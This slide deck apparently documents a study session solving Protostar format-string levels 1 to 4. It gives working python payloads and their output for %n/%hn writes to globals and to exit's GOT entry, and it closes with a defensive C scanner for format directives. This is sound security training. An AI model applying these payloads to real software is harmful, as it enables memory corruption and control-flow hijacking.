Tachikoma January



Monday, January 28, 13
Agenda

• Fusion lv.02, 03, 04
• 5 minutes python

WTF!?
Agenda

• Fusion lv.02, 03, 04
• 5 minutes python

Agenda

• Protostar format lv.01, 02, 03, 04
• 5 minutes python

Agenda

• Protostar format lv.01, 02, 03, 04
  • Sorry for doing so many of them…
• 5 minutes python
  • import "university assignment"

Protostar format 1

• Overwriting int target is enough
  • In C, global variables are initialised to 0
• Goal: set it to anything other than 0

Protostar format 1

• Apparently we just need to vary argv[1]
  • Find how far we have to pop before it shows up
    • It's an int, so 4 bytes
    • AAAA%x....
    • Doing it by hand doesn't find it…

Protostar format 1

• Around 132?
  • printf("AAAA%132%x", <same as on the left>);
    • Seems like that's what it turns into?

Protostar format 1

• Use %n to overwrite it with whatever
  • ./format1 `python -c 'print "\x38\x96\x04\x08xx%132$n"'`
    • 8xxyou have modified the target :)

Protostar format 2

• What changed
  • Input comes from stdin instead of argv
  • Apparently target has to become 64

Protostar format 2

• Pop to find it, the same way as in 1
  • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2
    • AAAA200,b7fd8420,bffff564,41414141
    • target is 0 :(
• This time four is enough

Protostar format 2

• Address of target
  • user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
    • 080496e4 g     O .bss	00000004              target
• Try it the same way as in 1
  • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%4$n"' | ./format2
    • ?
    • target is 4 :(

Protostar format 2

• target became 4!
  • %n is the number of characters written so far, right!
• Try it
  • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08x%4$n"' | ./format2
    • x
    • target is 5 :(

Protostar format 2

• Try once more
  • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08xx%4$n"' | ./format2
    • xx
    • target is 6 :(
• And 64-4=60, so…
  • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08"+ "x"*60 +"%4$n"' | ./format2
    • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    • you have modified the target :)

Protostar format 3

• What changed
  • printf() is no longer called directly; the input goes through printbuffer(char *)
  • We have to write a lot more

Protostar format 3

• First try the same thing as before
  • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3
    • AAAAxx0,bffff520,b7fd7ff4,0
    • target is 00000000 :(

Protostar format 3

• Fine, then: Python it is
  • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3
    • AAAAxx,0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252c7878,78252c78,2c78252c,252c7825
    • target is 00000000 :(
• It was the 12th one

Protostar format 3

• Address of target
  • user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target
    • 080496f4 g     O .bss	00000004              target

Protostar format 3

• Try it
  • python -c 'print "\xf4\x96\x04\x08" + "x"*256 + "%12$n"' | ./format3
    • xxxxxxxxxxxxxxxxxxxxx(snip)
    • target is 00000104 :(
• Doesn't work

Protostar format 3

• It's multi-byte!
  • Just do the same calculation for each byte!

• Try it
  • python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08%12$n%13$n%14$n"' | ./format3
    • ?
    • target is 000c0c0c :(

• Add some padding
  • python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08" + "x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n"' | ./format3
    • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx(snip)
    • you have modified the target :)

Protostar format 4

• What changed
  • Overwrite the GOT instead of target
• Goal
  • call hello()

Protostar format 4

• Address of hello
  • # objdump -d ./format4 | grep hello   [/opt/protostar/bin]
    • 080484b4 <hello>:

Protostar format 4

• pop, pop, pop...
  • python -c "print 'AAAA' + ',%x'*4" | ./format4
    • AAAA,200,b7fd8420,bffff9c4,41414141
• It was the 4th one

Protostar format 4

• Plan
  • Make it so that when exit() is about to be called, hello() gets called instead

Protostar format 4

• objdump -R ./format4 |grep exit
  • 08049718 R_386_JUMP_SLOT         _exit
  • 08049724 R_386_JUMP_SLOT         exit

Protostar format 4

• So we just need to overwrite 0x08049724 with hello()…
  • python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08" + "x"*168 + "%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn"' | ./format4
    • [1]   4950 done            python -c |
    •       4951 segmentation fault ./format4
• Did you mean: input too long

Protostar format 4

• Google("help me");
  • Writing %nd (n is any integer) pads it out, right?
  • Apparently that's the normal way to pad n bytes…

Protostar format 4

• Try once more
  • python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08" + "x"*168 + "%4$hn%976d%5$hn" + "x"*132 + "%6$hn"' | ./format4
    • $ %'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx(snip)
    • code execution redirected! you win

Protostar format 4

• Somehow it worked.

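Added example, not from the slides or the Protostar sources: all four levels rest on the shape named under format3, printbuffer(char *) passing user bytes to printf() as the format. The block shows the hardened form of that call and a directive scanner a defender can run over untrusted text to flag %x stack reads and %n/%hn writes before it reaches a printf-style function; the sample inputs are constructed from the payloads on the slides, the function names are mine, and the gcc flag referred to is -Wformat-security.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Protostar's code. format3's printbuffer(char *) hands
   user bytes to printf() as the FORMAT, i.e. printf(string): %x then walks
   the stack ("pop, pop, pop...") and %n / %hn write the count of bytes
   printed so far to an address supplied in that same input. gcc's
   -Wformat-security warns about a non-literal format with no arguments. */

/* Hardened printbuffer: the format is a constant and the user data is only
   an argument. Returns printf's byte count (the value %n would have used). */
int printbuffer_safe(const char *string)
{
    return printf("%s", string);
}

/* Scan untrusted text for the directives printf would interpret. Returns
   the number of directives; *has_write is set to 1 if any of them is an %n
   variant (%n, %hn, positional %4$n, ...), i.e. a memory write. "%%" is a
   literal percent and is not counted. A lone '%' at the end of the string
   counts as a (malformed) directive so that it is still flagged. */
int count_format_directives(const char *s, int *has_write)
{
    int count = 0;
    if (has_write) *has_write = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                    /* "%%" -> literal '%' */
        const char *q = p;
        while (isdigit((unsigned char)*q)) q++;     /* positional "N$", as in %12$n */
        if (*q == '$') q++; else q = p;
        while (*q && strchr("-+ #0", *q)) q++;      /* flags */
        while (isdigit((unsigned char)*q) || *q == '*') q++;  /* width, e.g. %976d */
        if (*q == '.') {                            /* precision */
            q++;
            while (isdigit((unsigned char)*q) || *q == '*') q++;
        }
        while (*q && strchr("hlLqjzt", *q)) q++;    /* length modifiers, e.g. %hn */
        count++;
        if (*q == 'n' && has_write) *has_write = 1;
        if (!*q) break;                             /* input ended mid-directive */
        p = q;                                      /* loop's p++ steps past the conversion */
    }
    return count;
}

/* 1 if the text carries at least one %n-style write directive. */
int has_write_directive(const char *s) { int w = 0; count_format_directives(s, &w); return w; }

/* Policy a front end can enforce: text may be used as a format only if it holds no directive. */
int is_safe_as_format(const char *s)
{
    return count_format_directives(s, NULL) == 0;
}

int main(void)
{
    /* Constructed inputs modelled on the slides' payloads. */
    const char *samples[] = {
        "AAAA%x,%x,%x,%x",        /* stack probe used on format2/3/4 */
        "\xe4\x96\x04\x08%4$n",   /* format2: one 4-byte write via %4$n */
        "%4$hn%976d%5$hn",        /* format4: short writes, padded with %976d */
        "100%% done",             /* harmless literal percent */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %zu: directives=%d write=%d safe=%d\n", i,
               count_format_directives(samples[i], NULL),
               has_write_directive(samples[i]), is_safe_as_format(samples[i]));
    printbuffer_safe("AAAA%x,%x,%x,%x\n");   /* printed verbatim, nothing interpreted */
    return 0;
}
```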
